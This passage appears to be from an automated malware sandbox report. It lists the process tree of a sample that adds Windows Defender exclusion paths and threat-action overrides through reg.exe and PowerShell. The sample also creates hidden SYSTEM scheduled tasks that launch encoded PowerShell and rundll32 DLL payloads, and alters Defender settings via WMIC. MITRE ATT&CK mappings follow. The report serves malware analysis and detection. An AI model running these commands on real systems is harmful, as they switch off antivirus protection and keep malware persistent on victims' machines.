    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5980
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1880
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3224
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gKUZYApeu" /SC once /ST 07:43:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:6044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gKUZYApeu"
  2⤵
  PID:2544
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gKUZYApeu"
  2⤵
  PID:5680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 12:17:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\pfiwZfX.exe\" XT /yjsite_idbUp 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
  2⤵
  PID:3492

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
- Executes dropped EXE
PID:5416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6036
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5904

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5784

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\pfiwZfX.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\pfiwZfX.exe XT /yjsite_idbUp 385118 /S
1⤵
PID:2844
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
  2⤵
  PID:5960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6012
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2072
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6140
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:2224
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:2316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\qqHPlp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\edrxjsD.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qbSDwEgyNYPZlGA"
  2⤵
  PID:5016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
  2⤵
  PID:5880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\MtZDFfZ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\yYTTUVp.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\EeYyqCb.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\vCWtAmk.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 11:41:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\UMedbuCK\niSMroa.dll\",#1 /Gpsite_idvXn 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:6024
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "QhciBzJOokLnyYZub"
  2⤵
  PID:5628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
  2⤵
  PID:5272

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
PID:5492

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\UMedbuCK\niSMroa.dll",#1 /Gpsite_idvXn 385118
1⤵
PID:2948
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\UMedbuCK\niSMroa.dll",#1 /Gpsite_idvXn 385118
  2⤵
  PID:6048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
    3⤵
    PID:5504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4944

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion